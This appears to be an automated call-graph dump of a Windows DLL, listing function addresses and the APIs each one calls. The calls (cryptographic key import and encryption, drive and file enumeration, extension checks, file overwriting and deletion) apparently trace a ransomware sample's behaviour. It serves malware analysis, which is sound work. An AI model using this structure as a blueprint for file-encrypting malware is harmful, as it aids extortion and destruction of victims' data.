10004990 31 API calls 1446->2168 1447->1446 1544 100057c0 1448->1544 1449->1448 1452 10005d3d 1452->1410 1453 10005d31 WaitForSingleObject CloseHandle 1453->1452 1455 100046c1 1454->1455 1456 100046a6 GetLastError 1454->1456 1455->1412 1456->1455 1457 100046b3 CloseHandle 1456->1457 1457->1412 1459 1000100a fopen 1458->1459 1461 1000105f 1459->1461 1462 1000102a 1459->1462 1461->1417 1463 10001043 fwrite 1462->1463 1464 10001036 fread 1462->1464 1465 1000104e 1463->1465 1464->1465 1466 10001056 fclose 1465->1466 1467 10001064 fclose 1465->1467 1466->1461 1467->1417 1585 100011d0 GetCurrentProcess OpenProcessToken 1468->1585 1470 100012fb 1471 10001303 1470->1471 1472 1000130f GetUserNameW 1470->1472 1473 10001331 _wcsicmp 1471->1473 1472->1473 1474 1000133e 1473->1474 1475 10003410 1474->1475 1601 10004440 1475->1601 1477 10003416 1478 1000342e LoadLibraryA 1477->1478 1479 10003427 1477->1479 1478->1479 1480 10003443 7 API calls 1478->1480 1479->1421 1480->1479 1482 1000461a CloseHandle 1481->1482 1483 1000462b sprintf CreateMutexA 1481->1483 1482->1424 1484 1000465d GetLastError 1483->1484 1485 1000467b 1483->1485 1484->1485 1487 1000466a CloseHandle 1484->1487 1606 100013e0 6 API calls 1485->1606 1487->1424 1488 10004681 1488->1424 1490 100045a2 1489->1490 1491 10004543 GetFileAttributesA 1489->1491 1490->1427 1491->1490 1492 1000454f 1491->1492 1607 10003a10 InitializeCriticalSection 1492->1607 1494 10004558 1608 10003d10 1494->1608 1496 10004573 1497 10004583 1496->1497 1498 1000459d 1496->1498 1624 10003a60 DeleteCriticalSection 1497->1624 1625 10003a60 DeleteCriticalSection 1498->1625 1501 10004588 1501->1427 1503 10003a80 CryptAcquireContextA 1502->1503 1504 10003aca 1503->1504 1505 10003add 1504->1505 1506 10003ace 1504->1506 1507 10003b16 1505->1507 1508 10003ae5 CryptImportKey 1505->1508 1509 10003bb0 3 API calls 1506->1509 1643 10003c00 1507->1643 1511 10003b07 1508->1511 1512 10003ba3 1508->1512 1513 10003ad5 1509->1513 1515 10003bb0 3 API calls 1511->1515 1512->1433 1513->1433 1516 10003b0e 1515->1516 1516->1433 1517 10003b22 CryptImportKey 1520 10003b40 1517->1520 1521 10003b86 1517->1521 1518 10003b95 1518->1512 1519 10003b9c CryptDestroyKey 1518->1519 1519->1512 1648 10004350 CryptGenKey 1520->1648 1522 10003bb0 3 API calls 1521->1522 1524 10003b8d 1522->1524 1524->1433 1525 10003b4d 1525->1521 1649 10004040 CryptExportKey 1525->1649 1527 10003b63 1527->1521 1528 10003b7a 1527->1528 1657 10003c40 1527->1657 1529 10003c00 8 API calls 1528->1529 1531 10003b82 1529->1531 1531->1518 1531->1521 1533 100046f3 1532->1533 1534 100046f8 ReadFile CloseHandle 1532->1534 1533->1435 1534->1435 1535->1438 1537 10003bc8 1536->1537 1538 10003bba CryptDestroyKey 1536->1538 1539 10003bcf CryptDestroyKey 1537->1539 1540 10003bdd 1537->1540 1538->1537 1539->1540 1541 10003be4 CryptReleaseContext 1540->1541 1542 10003bf4 CreateThread 1540->1542 1541->1542 1542->1442 1542->1443 2136 10004790 1542->2136 1543->1430 1681 10001590 1544->1681 1546 100057e8 1687 10001830 1546->1687 1548 1000580c 1549 10005814 GetFileAttributesA 1548->1549 1582 10005aab 1548->1582 1551 10005824 1549->1551 1552 1000583c time 1551->1552 1553 10005881 1551->1553 1697 10004730 CreateFileA 1552->1697 1708 10004cd0 GetFileAttributesW 1553->1708 1557 10005850 sprintf 1700 10001080 CreateProcessA 1557->1700 1561 10005875 1563 10001000 5 API calls 1561->1563 1563->1553 1565 100058ba InterlockedExchange 1566 1000591c GetLogicalDrives 1565->1566 1567 1000589b 1565->1567 1566->1567 1567->1565 1567->1566 1568 1000599d InterlockedExchange 1567->1568 1569 1000595f GetDriveTypeW 1567->1569 1571 10005972 GetDriveTypeW 1567->1571 1578 10001080 6 API calls 1567->1578 1579 10005a10 sprintf 1567->1579 1581 10005a93 Sleep 1567->1581 1567->1582 1583 10005a5d GetDriveTypeW 1567->1583 1584 10005190 29 API calls 1567->1584 1737 10005540 1567->1737 1755 10004a40 SHGetFolderPathW wcslen 1568->1755 1569->1567 1571->1567 1573 100059ce sprintf 1576 10001080 6 API calls 1573->1576 1574 100059f4 time 1575 10004730 3 API calls 1574->1575 1575->1567 1577 100059b8 1576->1577 1577->1573 1577->1574 1578->1567 1580 10001080 6 API calls 1579->1580 1580->1567 1581->1567 1581->1582 1776 10001680 1582->1776 1583->1567 1584->1567 1586 100011fb GetTokenInformation 1585->1586 1587 100011f5 1585->1587 1588 1000122d GlobalAlloc GetTokenInformation 1586->1588 1589 1000121a GetLastError 1586->1589 1587->1470 1590 10001254 1588->1590 1591 1000125a LoadLibraryA 1588->1591 1589->1588 1592 10001225 1589->1592 1590->1470 1593 10001269 1591->1593 1594 1000126f GetProcAddress 1591->1594 1592->1470 1593->1470 1595 10001285 1594->1595 1596 1000127f 1594->1596 1597 1000129b 1595->1597 1598 100012a1 wcscpy 1595->1598 1596->1470 1597->1470 1599 100012bf 1598->1599 1600 100012b8 GlobalFree 1598->1600 1599->1470 1600->1599 1602 1000444a 1601->1602 1603 10004451 LoadLibraryA 1601->1603 1602->1477 1604 100044c6 1603->1604 1605 10004466 6 API calls 1603->1605 1604->1477 1605->1604 1606->1488 1607->1494 1626 10003a80 1608->1626 1610 10003d9e 1611 10003e43 1610->1611 1631 10003f00 CreateFileA 1610->1631 1611->1496 1613 10003e35 _local_unwind2 1613->1611 1614 10003dbe 1614->1613 1615 10003f00 7 API calls 1614->1615 1617 10003dda 1615->1617 1617->1613 1618 10003de5 CryptEncrypt 1617->1618 1618->1613 1619 10003e58 CryptDecrypt 1618->1619 1619->1613 1620 10003e82 strncmp 1619->1620 1621 10003ed4 1620->1621 1622 10003eae _local_unwind2 1620->1622 1640 10003ef6 1621->1640 1622->1496 1624->1501 1625->1490 1627 10003a87 CryptAcquireContextA 1626->1627 1628 10003aa7 1627->1628 1629 10003ab0 1627->1629 1628->1627 1630 10003aad 1628->1630 1629->1610 1630->1610 1632 10003f59 GetFileSize 1631->1632 1633 10003f6b _local_unwind2 1631->1633 1632->1633 1634 10003f75 1632->1634 1633->1614 1634->1633 1636 10003f88 GlobalAlloc 1634->1636 1636->1633 1637 10003f99 ReadFile 1636->1637 1637->1633 1638 10003fb4 CryptImportKey 1637->1638 1638->1633 1639 10003fd1 _local_unwind2 1638->1639 1639->1614 1641 10003bb0 3 API calls 1640->1641 1642 10003efd 1641->1642 1642->1611 1644 10003c1b 1643->1644 1645 10003c0e CryptDestroyKey 1643->1645 1646 10003f00 7 API calls 1644->1646 1645->1644 1647 10003b1e 1646->1647 1647->1517 1647->1518 1648->1525 1650 10004099 GlobalAlloc 1649->1650 1655 10004091 _local_unwind2 1649->1655 1652 100040b5 CryptExportKey 1650->1652 1650->1655 1653 100040eb CreateFileA 1652->1653 1652->1655 1654 10004116 WriteFile 1653->1654 1653->1655 1654->1655 1656 1000412e _local_unwind2 1654->1656 1655->1527 1656->1527 1658 10003c5d 1657->1658 1659 10003c67 1657->1659 1658->1528 1666 10004170 1659->1666 1661 10003c7f 1662 10003c90 CreateFileA 1661->1662 1663 10003c88 1661->1663 1664 10003ce6 GlobalFree 1662->1664 1665 10003cb0 SetFilePointer WriteFile WriteFile 1662->1665 1663->1528 1664->1528 1665->1664 1679 10006bd0 1666->1679 1668 1000417a CryptExportKey 1669 100041b7 1668->1669 1670 100041c2 CryptGetKeyParam 1668->1670 1669->1661 1671 10004206 GlobalAlloc 1670->1671 1672 100041e9 1670->1672 1673 10004237 1671->1673 1676 10004254 1671->1676 1672->1661 1673->1661 1673->1673 1674 1000427e CryptEncrypt 1675 1000431b GlobalFree 1674->1675 1674->1676 1678 1000432f 1675->1678 1676->1674 1677 100042fc 1676->1677 1677->1661 1678->1661 1680 10006bdc 1679->1680 1680->1668 1680->1680 1787 10003a10 InitializeCriticalSection 1681->1787 1683 100015b8 1788 10003a10 InitializeCriticalSection 1683->1788 1685 100015c6 1686 100015d3 ??2@YAPAXI 1685->1686 1686->1546 1688 10003ac0 33 API calls 1687->1688 1689 10001843 1688->1689 1690 10001847 1689->1690 1691 1000185c GlobalAlloc 1689->1691 1692 10003ac0 33 API calls 1689->1692 1690->1548 1693 10001875 1691->1693 1694 1000187a GlobalAlloc 1691->1694 1692->1691 1693->1548 1695 1000188d 1694->1695 1696 10001892 InitializeCriticalSection CreateThread GetTickCount srand 1694->1696 1695->1548 1696->1548 1789 100029e0 1696->1789 1698 1000475b WriteFile CloseHandle 1697->1698 1699 10004756 1697->1699 1698->1557 1699->1557 1701 100010dd 1700->1701 1702 10001135 1700->1702 1703 10001116 CloseHandle CloseHandle 1701->1703 1704 100010e5 WaitForSingleObject 1701->1704 1702->1561 1703->1561 1705 10001102 1704->1705 1706 100010f5 TerminateProcess 1704->1706 1705->1703 1707 1000110a GetExitCodeProcess 1705->1707 1706->1705 1707->1703 1709 10004ce9 CopyFileA 1708->1709 1710 10004cfb GetFileAttributesW 1708->1710 1709->1710 1711 10004d0b GetCurrentDirectoryA 1710->1711 1712 10004dd5 1710->1712 1713 10004d5b 1711->1713 1714 10004d9e sprintf 1711->1714 1716 10004df0 1712->1716 1713->1714 1807 10001140 6 API calls 1714->1807 1717 10006bd0 1716->1717 1718 10004dfa GetFileAttributesW 1717->1718 1719 10004f0f 1718->1719 1720 10004e11 fopen 1718->1720 1726 10005480 SHGetFolderPathW wcslen 1719->1726 1720->1719 1721 10004e2e fread fclose _wfopen 1720->1721 1721->1719 1722 10004e7c 1721->1722 1723 10004e85 _ftol sprintf 1722->1723 1724 10004ea8 sprintf 1722->1724 1725 10004ec9 sprintf fwrite fclose 1723->1725 1724->1725 1725->1719 1727 100054d3 1726->1727 1728 100054e1 SHGetFolderPathW wcslen 1726->1728 1812 100027f0 ??2@YAPAXI 1727->1812 1730 10005505 1728->1730 1731 10005513 1728->1731 1732 100027f0 168 API calls 1730->1732 1733 10004a40 16 API calls 1731->1733 1732->1731 1734 10005520 1733->1734 1735 10004a40 16 API calls 1734->1735 1736 1000552d 1735->1736 1736->1567 1738 100055f2 GetDriveTypeW 1737->1738 1739 10005577 InterlockedExchangeAdd 1737->1739 1740 10005668 1738->1740 1742 10005604 InterlockedExchange 1738->1742 1739->1740 1741 1000558c 1739->1741 1740->1567 1743 1000559a GetDiskFreeSpaceExW 1741->1743 1745 100055c6 Sleep 1741->1745 1749 100055de GetDriveTypeW 1741->1749 1744 10005610 GetDriveTypeW 1742->1744 1743->1741 1743->1745 1746 10005623 1744->1746 1747 10005653 1744->1747 1745->1743 1748 100055d3 1745->1748 2113 10005060 GetWindowsDirectoryW 1746->2113 1750 100027f0 168 API calls 1747->1750 1748->1567 1749->1740 1753 100055f0 1749->1753 1750->1740 1752 10005644 2120 10001910 wcscpy swprintf 1752->2120 1753->1744 1756 10004ab9 wcsrchr 1755->1756 1757 10004aac 1755->1757 1758 10004acf 1756->1758 1759 10004ada wcschr 1756->1759 1757->1577 1758->1577 1760 10004b01 1759->1760 1761 10004af6 1759->1761 1762 10004b54 swprintf FindFirstFileW 1760->1762 1763 10004b0b SHGetFolderPathW wcslen 1760->1763 1761->1577 1764 10004baf 1762->1764 1765 10004bbc 1762->1765 1763->1762 1766 10004b33 wcsrchr 1763->1766 1764->1577 1767 10004bca wcscmp 1765->1767 1766->1762 1768 10004b4c 1766->1768 1769 10004c95 FindNextFileW 1767->1769 1770 10004be8 wcscmp 1767->1770 1768->1762 1769->1767 1771 10004cb0 FindClose 1769->1771 1770->1769 1773 10004c06 1770->1773 1771->1577 1772 10004c14 swprintf 1772->1773 1773->1769 1773->1772 1774 10004c4f wcscmp 1773->1774 1774->1769 1775 10004c5e swprintf 1774->1775 1775->1769 2121 10001760 1776->2121 1779 100016fe ??3@YAXPAX 1781 10001728 1779->1781 1780 100016c5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N ??3@YAXPAX 1780->1780 1782 100016fd 1780->1782 2134 10003a60 DeleteCriticalSection 1781->2134 1782->1779 1784 10001734 2135 10003a60 DeleteCriticalSection 1784->2135 1786 10001744 1786->1452 1786->1453 1787->1683 1788->1685 1792 100029f0 1789->1792 1793 10002b88 ExitThread 1792->1793 1794 10002a04 1792->1794 1794->1793 1795 10002a12 Sleep 1794->1795 1796 10002a2f EnterCriticalSection 1794->1796 1798 10002a68 wcslen 1794->1798 1804 10002b46 ??3@YAXPAX 1794->1804 1806 10002b3a ??3@YAXPAX 1794->1806 1795->1794 1796->1794 1797 10002b6f LeaveCriticalSection 1796->1797 1797->1793 1797->1794 1799 10002a76 MoveFileExW 1798->1799 1800 10002ae4 DeleteFileW 1798->1800 1802 10002aab swprintf MoveFileExW 1799->1802 1803 10002a84 GetFileAttributesW 1799->1803 1800->1794 1801 10002aef GetFileAttributesW SetFileAttributesW MoveFileExW 1800->1801 1801->1794 1802->1794 1802->1800 1803->1802 1805 10002a90 GetFileAttributesW SetFileAttributesW MoveFileExW 1803->1805 1804->1794 1804->1797 1805->1802 1806->1804 1808 10001198 fprintf fclose 1807->1808 1809 10001190 1807->1809 1810 10001080 6 API calls 1808->1810 1809->1712 1811 100011c1 1810->1811 1811->1712 1822 10002300 ??2@YAPAXI 1812->1822 1814 100028b8 1880 10002ba0 1814->1880 1817 100028c1 1820 10002912 ??3@YAXPAX 1817->1820 1821 100028eb ??3@YAXPAX 1817->1821 1818 10002853 1818->1814 1819 10002885 ??3@YAXPAX 1818->1819 1869 10002940 1818->1869 1819->1818 1820->1728 1821->1817 1821->1820 1897 10003730 ??2@YAPAXI 1822->1897 1825 100023af 1899 100036a0 1825->1899 1826 10002413 1908 10002f70 GetTempFileNameW CreateFileW 1826->1908 1829 100023cd ??3@YAXPAX 1905 100037c0 1829->1905 1832 10002438 wcscmp 1834 1000244f wcscmp 1832->1834 1835 1000262a FindNextFileW 1832->1835 1833 100027c9 1833->1818 1834->1835 1837 10002466 swprintf 1834->1837 1836 10002642 FindClose 1835->1836 1857 10002419 1835->1857 1844 1000265a 1836->1844 1851 10002686 1836->1851 1837->1857 1838 10002940 103 API calls 1838->1844 1839 10002694 _wcsnicmp 1841 100026b4 1839->1841 1840 1000252b wcscmp 1840->1835 1843 10002542 wcscmp 1840->1843 1866 10002706 1841->1866 1956 10003200 swprintf CopyFileW 1841->1956 1843->1835 1845 10002559 wcscmp 1843->1845 1844->1838 1846 10003760 ??2@YAPAXI 1844->1846 1844->1851 1845->1835 1845->1857 1846->1844 1848 100024b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 1933 100035c0 ??2@YAPAXI 1848->1933 1849 10002771 ??3@YAXPAX 1854 100027b7 ??3@YAXPAX 1849->1854 1855 1000278e ??3@YAXPAX 1849->1855 1850 10002746 1850->1849 1863 1000276d 1850->1863 1959 10003620 1850->1959 1851->1839 1851->1841 1852 100026f9 1858 10002708 1852->1858 1859 10002701 1852->1859 1854->1833 1855->1854 1855->1855 1857->1832 1857->1835 1857->1836 1857->1840 1857->1848 1867 100025bf wcsncpy wcsncpy 1857->1867 1911 100032c0 _wcsnicmp 1857->1911 1937 10002d60 wcsrchr 1857->1937 1958 10003240 swprintf CopyFileW 1858->1958 1957 10003280 swprintf CopyFileW 1859->1957 1863->1849 1865 10002300 141 API calls 1865->1866 1866->1850 1866->1865 1954 10003760 ??2@YAPAXI 1867->1954 1871 10002953 1869->1871 1870 100029aa 1870->1818 1871->1870 1872 10002973 1871->1872 1873 1000295f 1871->1873 1874 100029b1 DeleteFileW 1871->1874 1875 10002200 100 API calls 1872->1875 1978 10002200 1873->1978 1874->1870 1877 1000297d 1875->1877 1877->1870 1879 10002981 wcscat wcscat 1877->1879 1878 10002969 1878->1818 1879->1870 1881 10002bcb wcslen 1880->1881 1882 10002cfd wcslen 1880->1882 1883 10002bef EnterCriticalSection wcslen ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 1881->1883 1884 10002be2 1881->1884 1885 10002d18 1882->1885 1886 10002d11 DeleteFileW 1882->1886 1888 10002c48 ??2@YAPAXI 1883->1888 1889 10002c2d 1883->1889 2091 10003010 1884->2091 1885->1817 1886->1885 1891 10002c65 1888->1891 1889->1888 1890 10002bec 1890->1883 1892 10003810 7 API calls 1891->1892 1893 10002c8a 1892->1893 1894 10002cde LeaveCriticalSection 1893->1894 1895 10002cd2 ??3@YAXPAX 1893->1895 1896 10002cae LeaveCriticalSection 1893->1896 1894->1817 1895->1894 1896->1817 1898 10002363 swprintf FindFirstFileW 1897->1898 1898->1825 1898->1826 1900 1000371a 1899->1900 1903 100036b0 1899->1903 1900->1829 1901 100036ec ??3@YAXPAX 1901->1903 1904 1000370d 1901->1904 1902 100036e0 ??3@YAXPAX 1902->1901 1903->1901 1903->1902 1904->1829 1906 100037d1 ??3@YAXPAX 1905->1906 1907 100023ff ??3@YAXPAX 1905->1907 1906->1906 1906->1907 1907->1833 1909 10002fc7 CloseHandle DeleteFileW 1908->1909 1910 10002fdd 1908->1910 1909->1910 1910->1857 1912 100032e2 wcsstr 1911->1912 1913 100032ef 1911->1913 1912->1913 1914 100033b9 _wcsicmp 1913->1914 1915 10003300 _wcsicmp 1913->1915 1916 100033cc 1914->1916 1917 100033d7 _wcsicmp 1914->1917 1918 10003312 1915->1918 1919 1000331d _wcsicmp 1915->1919 1916->1857 1920 100033f1 _wcsicmp 1917->1920 1921 100033e6 1917->1921 1918->1857 1922 10003337 _wcsicmp 1919->1922 1923 1000332c 1919->1923 1920->1857 1921->1857 1924 10003351 _wcsicmp 1922->1924 1925 10003346 1922->1925 1923->1857 1926 10003360 1924->1926 1927 1000336b _wcsicmp 1924->1927 1925->1857 1926->1857 1928 1000337a 1927->1928 1929 10003385 wcsstr 1927->1929 1928->1857 1930 1000339f wcsstr 1929->1930 1931 10003394 1929->1931 1930->1914 1932 100033ae 1930->1932 1931->1857 1932->1857 1934 100035df 1933->1934 1964 10003810 1934->1964 1936 10002508 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 1936->1835 1938 10002d7f _wcsicmp 1937->1938 1939 10002d79 1937->1939 1940 10002e5b 1938->1940 1941 10002d98 _wcsicmp 1938->1941 1939->1857 1940->1857 1941->1940 1942 10002dab _wcsicmp 1941->1942 1943 10002dc5 1942->1943 1944 10002dba 1942->1944 1945 10002dd3 _wcsicmp 1943->1945 1946 10002dea 1943->1946 1944->1857 1945->1943 1947 10002e11 1945->1947 1948 10002e27 _wcsicmp 1946->1948 1949 10002df8 _wcsicmp 1946->1949 1953 10002e0f 1946->1953 1947->1857 1950 10002e36 1948->1950 1951 10002e41 _wcsicmp 1948->1951 1949->1946 1952 10002e1c 1949->1952 1950->1857 1951->1857 1952->1857 1953->1948 1955 1000377f 1954->1955 1955->1835 1956->1852 1957->1866 1958->1866 1960 10003641 1959->1960 1961 10003660 ??3@YAXPAX 1959->1961 1962 10003654 ??3@YAXPAX 1960->1962 1963 1000364d 1960->1963 1961->1850 1962->1961 1963->1961 1965 10003840 1964->1965 1973 10003944 1964->1973 1966 10003868 1965->1966 1971 100038db 1965->1971 1968 10003874 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 1966->1968 1969 1000386e ?_Xran@std@ 1966->1969 1967 10003935 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 1967->1973 1970 10003885 1968->1970 1969->1968 1972 100038c0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 1970->1972 1976 100038a1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 1970->1976 1971->1967 1974 100038f5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 1971->1974 1972->1936 1973->1936 1975 10003906 1974->1975 1975->1936 1976->1972 1977 100038b7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 1976->1977 1977->1972 1979 1000227a swprintf 1978->1979 1980 1000221a wcscpy wcsrchr 1978->1980 1981 1000229a GetFileAttributesW 1979->1981 1982 10002245 _wcsicmp 1980->1982 1983 10002265 1980->1983 1984 100022d8 1981->1984 1985 100022aa 1981->1985 1986 1000226f wcscat 1982->1986 1987 1000225e wcscpy 1982->1987 1983->1986 1989 100022dd 1984->1989 1990 100022e7 1984->1990 1994 10001960 1985->1994 1986->1981 1987->1981 1992 10002ba0 29 API calls 1989->1992 1990->1878 1991 100022ba 1991->1984 1993 100022be DeleteFileW 1991->1993 1992->1990 1993->1878 1995 10001a07 1994->1995 1996 10001a12 CreateFileW 1994->1996 1995->1996 1997 10001a34 1996->1997 1998 10001a74 GetFileSizeEx 1996->1998 2005 10001a48 CreateFileW 1997->2005 2019 10001a86 1997->2019 1999 10001a91 GetFileTime ReadFile 1998->1999 1998->2019 2001 10001ace 1999->2001 2002 10001b98 SetFilePointer 1999->2002 2000 1000208e _local_unwind2 2000->1991 2001->2002 2006 10001ae8 ReadFile 2001->2006 2003 10001c5b ReadFile 2002->2003 2004 10001bb7 swprintf CreateFileW 2002->2004 2009 10001c7f 2003->2009 2003->2019 2007 10001c01 CreateFileW 2004->2007 2021 10001c38 2004->2021 2005->1998 2008 10001a6a 2005->2008 2006->2002 2010 10001b0e 2006->2010 2007->2019 2007->2021 2008->2000 2011 10001c8f SetFilePointer WriteFile 2009->2011 2009->2019 2010->2002 2012 10001b22 ReadFile 2010->2012 2014 10001cbc 2011->2014 2011->2019 2012->2002 2015 10001b44 ReadFile 2012->2015 2013 10001d66 2052 10004370 2013->2052 2017 10001ccc SetFilePointer WriteFile 2014->2017 2014->2019 2015->2002 2020 10001b67 2015->2020 2018 10001d09 2017->2018 2017->2019 2018->2019 2023 10001d19 SetFilePointer 2018->2023 2019->2000 2020->2002 2024 10001b72 _local_unwind2 2020->2024 2021->2013 2025 10001d54 rand 2021->2025 2022 10001dba 2022->2019 2061 10005dc0 2022->2061 2023->2021 2024->1991 2025->2013 2027 10001de3 WriteFile 2027->2019 2029 10001e30 WriteFile 2027->2029 2029->2019 2030 10001e51 WriteFile 2029->2030 2030->2019 2031 10001e77 WriteFile 2030->2031 2031->2019 2032 10001e95 WriteFile 2031->2032 2032->2019 2033 10001eb6 2032->2033 2034 100020b7 SetFileTime 2033->2034 2037 10001ee5 SetFilePointer ReadFile 2033->2037 2051 10001f9b 2033->2051 2035 10002130 CloseHandle MoveFileW 2034->2035 2036 100020da CloseHandle CloseHandle MoveFileW 2034->2036 2043 10002158 _local_unwind2 2035->2043 2039 10002121 DeleteFileW 2036->2039 2040 10002110 SetFileAttributesW 2036->2040 2037->2019 2041 10001f19 2037->2041 2038 100020ab 2038->2034 2039->2043 2040->2043 2041->2019 2068 10006940 2041->2068 2043->1991 2044 10001fcc ReadFile 2044->2019 2044->2051 2047 10001f6a 2047->2019 2048 10001f7a SetFilePointer 2047->2048 2048->2051 2049 10006940 12 API calls 2050 1000205a WriteFile 2049->2050 2050->2019 2050->2051 2051->2019 2051->2038 2051->2044 2051->2049 2053 1000437d 2052->2053 2054 10004386 2052->2054 2053->2022 2081 10004420 CryptGenRandom 2054->2081 2056 10004397 2057 1000439b 2056->2057 2058 100043b2 EnterCriticalSection CryptEncrypt 2056->2058 2057->2022 2059 100043f2 LeaveCriticalSection 2058->2059 2060 10004401 LeaveCriticalSection 2058->2060 2059->2022 2060->2057 2062 10005dce ??0exception@@QAE@ABQBD _CxxThrowException 2061->2062 2064 10005df4 2061->2064 2062->2064 2063 10005e2d 2066 10005e40 ??0exception@@QAE@ABQBD _CxxThrowException 2063->2066 2067 10005e66 2063->2067 2064->2063 2065 10005e07 ??0exception@@QAE@ABQBD _CxxThrowException 2064->2065 2065->2063 2066->2067 2067->2027 2067->2067 2069 10006950 ??0exception@@QAE@ABQBD _CxxThrowException 2068->2069 2070 1000696e 2068->2070 2069->2070 2071 10006b7c ??0exception@@QAE@ABQBD _CxxThrowException 2070->2071 2077 10006990 2070->2077 2072 10006b34 2074 10006640 4 API calls 2072->2074 2080 10001f46 WriteFile 2072->2080 2073 10006a69 2073->2072 2075 10006640 4 API calls 2073->2075 2079 10006b16 ??0exception@@QAE@ABQBD _CxxThrowException 2073->2079 2073->2080 2074->2072 2075->2073 2076 10006a4b ??0exception@@QAE@ABQBD _CxxThrowException 2076->2073 2077->2073 2077->2076 2077->2080 2082 10006640 2077->2082 2079->2072 2080->2019 2080->2047 2081->2056 2083 10006650 ??0exception@@QAE@ABQBD _CxxThrowException 2082->2083 2084 1000666e 2082->2084 2083->2084 2085 10006694 2084->2085 2088 10006280 2084->2088 2085->2077 2089 100062af 2088->2089 2090 10006291 ??0exception@@QAE@ABQBD _CxxThrowException 2088->2090 2089->2077 2090->2089 2092 10006bd0 2091->2092 2093 1000301a GetFileAttributesW 2092->2093 2094 10003030 2093->2094 2095 1000303c 2093->2095 2094->1890 2096 10003040 SetFileAttributesW 2095->2096 2097 1000304a CreateFileW 2095->2097 2096->2097 2098 100030a3 GetFileSizeEx 2097->2098 2099 10003066 2097->2099 2100 100030bf 2098->2100 2106 100030ea 2098->2106 2101 10003073 2099->2101 2102 1000307d CreateFileW 2099->2102 2112 10004420 CryptGenRandom 2100->2112 2101->1890 2102->2098 2104 10003097 2102->2104 2104->1890 2105 10003161 2108 1000316e WriteFile FlushFileBuffers SetFilePointer 2105->2108 2106->2105 2107 10003142 SetFilePointer 2106->2107 2107->2108 2109 100031e9 CloseHandle 2108->2109 2110 10003195 2108->2110 2109->1890 2110->2109 2111 100031ba WriteFile 2110->2111 2111->2110 2112->2106 2114 1000508e GetTempPathW wcslen 2113->2114 2115 100050d0 swprintf CreateDirectoryW sprintf 2113->2115 2116 100050aa wcslen 2114->2116 2118 10005112 2114->2118 2117 10001080 6 API calls 2115->2117 2116->2118 2119 100050b8 wcslen 2116->2119 2117->2118 2118->1752 2119->1752 2120->1747 2122 10003bb0 3 API calls 2121->2122 2123 1000176c 2122->2123 2124 10003bb0 3 API calls 2123->2124 2126 10001774 2124->2126 2125 100017cc 2129 10001800 DeleteCriticalSection wcslen 2125->2129 2130 100017d6 WaitForSingleObject CloseHandle 2125->2130 2126->2126 2127 100017a3 2126->2127 2128 10001790 GlobalFree 2126->2128 2127->2125 2127->2127 2131 100017b9 GlobalFree 2127->2131 2128->2127 2132 10001821 DeleteFileW 2129->2132 2133 100016b2 2129->2133 2130->2129 2131->2125 2132->2133 2133->1779 2133->1780 2134->1784 2135->1786 2137 100047da ExitThread 2136->2137 2140 1000479c 2136->2140 2138 100047a8 time 2139 10004730 3 API calls 2138->2139 2139->2140 2140->2137 2140->2138 2141 100047c4 Sleep 2140->2141 2141->2140 2143 100045cc 2142->2143 2144 10004500 21 API calls 2143->2144 2145 100045e7 ExitThread 2143->2145 2146 100045de Sleep 2143->2146 2144->2143 2146->2143 2148 100049a6 time 2147->2148 2149 10004a24 Sleep 2148->2149 2155 100049b7 2148->2155 2149->2148 2150 100049c6 time 2152 10001000 5 API calls 2150->2152 2152->2155 2153 100049eb GetFullPathNameA 2178 100047f0 2153->2178 2155->2149 2155->2150 2155->2153 2169 10004890 2155->2169 2157 10005337 2156->2157 2158 10005309 2156->2158 2159 10001080 6 API calls 2158->2159 2160 1000531e Sleep 2159->2160 2160->2158 2161 10005331 2160->2161 2163 10005745 Sleep GetLogicalDrives 2162->2163 2164 100057af ExitThread 2162->2164 2165 10005760 2163->2165 2165->2163 2165->2164 2166 10005781 CreateThread 2165->2166 2166->2165 2167 10005799 CloseHandle 2166->2167 2199 10005680 2166->2199 2167->2165 2185 10001360 AllocateAndInitializeSid 2169->2185 2171 1000489c 2172 100048a9 GetFullPathNameA sprintf 2171->2172 2173 10004913 CreateProcessA 2171->2173 2174 10001080 6 API calls 2172->2174 2176 10004969 CloseHandle CloseHandle 2173->2176 2177 1000497f 2173->2177 2175 10004907 2174->2175 2175->2173 2175->2177 2176->2177 2177->2155 2179 10001360 3 API calls 2178->2179 2180 10004810 2179->2180 2190 100014a0 GetComputerNameW wcslen 2180->2190 2183 10001080 6 API calls 2184 1000487d 2183->2184 2184->2155 2186 100013ab CheckTokenMembership 2185->2186 2187 100013a6 2185->2187 2188 100013c0 2186->2188 2189 100013c4 FreeSid 2186->2189 2187->2171 2188->2189 2189->2171 2191 100014f7 2190->2191 2192 10001517 srand rand 2190->2192 2193 100014fb wcslen 2191->2193 2194 10001533 2192->2194 2193->2192 2193->2193 2195 1000155d 2194->2195 2196 10001548 rand 2194->2196 2197 10001579 sprintf 2195->2197 2198 10001564 rand 2195->2198 2196->2195 2196->2196 2197->2183 2198->2197 2198->2198 2200 10001590 2 API calls 2199->2200 2201 100056a4 2200->2201 2202 10001830 57 API calls 2201->2202 2203 100056c7 2202->2203 2204 100056cb 2203->2204 2205 100056f8 2203->2205 2207 10001680 14 API calls 2204->2207 2206 10005540 191 API calls 2205->2206 2208 1000570d 2206->2208 2209 100056df 2207->2209 2214 10005190 GetDriveTypeW 2208->2214 2211 10005713 2212 10001760 10 API calls 2211->2212 2213 1000571f ExitThread 2212->2213 2215 100052ee 2214->2215 2216 100051cf GlobalAlloc 2214->2216 2215->2211 2216->2215 2217 100051e6 2216->2217 2228 10005120 2217->2228 2219 10005215 CreateFileW 2220 10005239 GlobalFree 2219->2220 2221 1000524a MoveFileExW 2219->2221 